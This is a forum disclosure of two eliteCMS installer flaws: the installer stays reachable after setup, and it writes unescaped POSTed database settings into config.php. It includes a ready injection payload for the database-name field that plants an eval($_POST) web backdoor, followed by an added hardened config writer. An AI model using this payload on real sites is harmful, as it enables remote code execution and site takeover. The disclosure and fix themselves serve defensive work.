eliteCMS installer not locked after install + one-liner shell write vulnerability

OP, posted 2012-11-18 13:59:27
The eliteCMS installer is not locked after installation finishes, so an attacker can re-run the installation simply by visiting the installer URL.

The second vulnerability is that the installer can write a one-liner shell straight into admin/includes/config.php.
Let's look at the code:

...
elseif ($_GET['step'] == "4") {
    $file = "../admin/includes/config.php";
    $write = "<?php\n";
    $write .= "/**\n";
    $write .= "*\n";
    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
...omitted...
    $write .= "*\n";
    $write .= "*/\n";
    $write .= "\n";
    // session values are interpolated into the PHP source verbatim, with no escaping
    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
    $write .= "if (!\$connection) {\n";
    $write .= "        die(\"Database connection failed\" .mysql_error());\n";
    $write .= "        \n";
    $write .= "} \n";
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
    $write .= "if (!\$db_select) {\n";
    $write .= "        die(\"Database select failed\" .mysql_error());\n";
    $write .= "        \n";
    $write .= "} \n";
    $write .= "?>\n";

    $writer = fopen($file, 'w');
...
Now look at this code:

$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
$_SESSION['DB_USER'] = $_POST['DB_USER'];
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];

The values are taken without any validation at all.
If the database name POSTed is:

"?><?php eval($_POST[c]);?><?php

a one-liner backdoor will be written to /admin/includes/config.php.
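For comparison, here is an added example of how the step-4 writer could be hardened. This is not eliteCMS code and not the OP's; the function names, the install.lock path and the use of mysqli are assumptions. It closes both issues above: the installer refuses to run once a lock file exists, the connection parameters are validated against a strict character set, and every value is emitted through var_export(), so quotes, backslashes or a "?>" inside a value stay inside the PHP string literal instead of breaking out of the define() call.

```php
<?php
// Added example (not eliteCMS code): a hardened version of the installer's
// "step 4" config writer. Function names and file paths are assumptions.

// Refuse to run the installer again once installation has completed.
function installer_is_locked(string $lockFile): bool
{
    return file_exists($lockFile);
}

// Restrict connection parameters to a conservative character set, so a value
// such as  "?><?php ... ?><?php  is rejected before anything is written.
// DB_PASS is intentionally not pattern-checked (passwords may contain
// anything); var_export() below makes it safe to embed regardless.
function validate_db_setting(string $name, string $value): string
{
    $patterns = [
        'DB_SERVER' => '/^[A-Za-z0-9.\-]{1,255}(:\d{1,5})?$/',
        'DB_NAME'   => '/^[A-Za-z0-9_]{1,64}$/',
        'DB_USER'   => '/^[A-Za-z0-9_.\-]{1,32}$/',
    ];
    if (isset($patterns[$name]) && !preg_match($patterns[$name], $value)) {
        throw new InvalidArgumentException("Invalid value for $name");
    }
    return $value;
}

// Build the config file body. var_export() emits a properly quoted and
// escaped PHP string literal; the PHP lexer never treats "?>" inside a
// string literal as a closing tag, so no injected code can be executed.
function build_config(array $settings): string
{
    $out = "<?php\n";
    foreach (['DB_SERVER', 'DB_NAME', 'DB_USER', 'DB_PASS'] as $key) {
        $value = validate_db_setting($key, (string) ($settings[$key] ?? ''));
        $out .= sprintf("define('%s', %s);\n", $key, var_export($value, true));
    }
    $out .= "\$connection = mysqli_connect(DB_SERVER, DB_USER, DB_PASS, DB_NAME);\n";
    $out .= "if (!\$connection) {\n";
    $out .= "    die('Database connection failed: ' . mysqli_connect_error());\n";
    $out .= "}\n";
    return $out; // no closing ?> tag, so no stray output after the config
}

function write_config(string $file, string $lockFile, array $post): void
{
    if (installer_is_locked($lockFile)) {
        http_response_code(403);
        exit('Installation is already complete; remove the installer directory.');
    }
    $body = build_config($post);
    if (file_put_contents($file, $body, LOCK_EX) === false) {
        exit('Could not write configuration file.');
    }
    // Create the lock so step 4 can never be replayed.
    file_put_contents($lockFile, date('c') . "\n", LOCK_EX);
}

// Usage at the installer's step 4 (assumed paths):
// write_config('../admin/includes/config.php', '../install/install.lock', $_POST);
```

With this writer, the POST body shown above fails the DB_NAME pattern and the request is rejected; even a value that passes no pattern (DB_PASS) ends up as a harmless string literal such as define('DB_PASS', '?><?php eval($_POST[c]);?><?php');. Deleting the install directory after setup remains the simplest defence against the re-install issue.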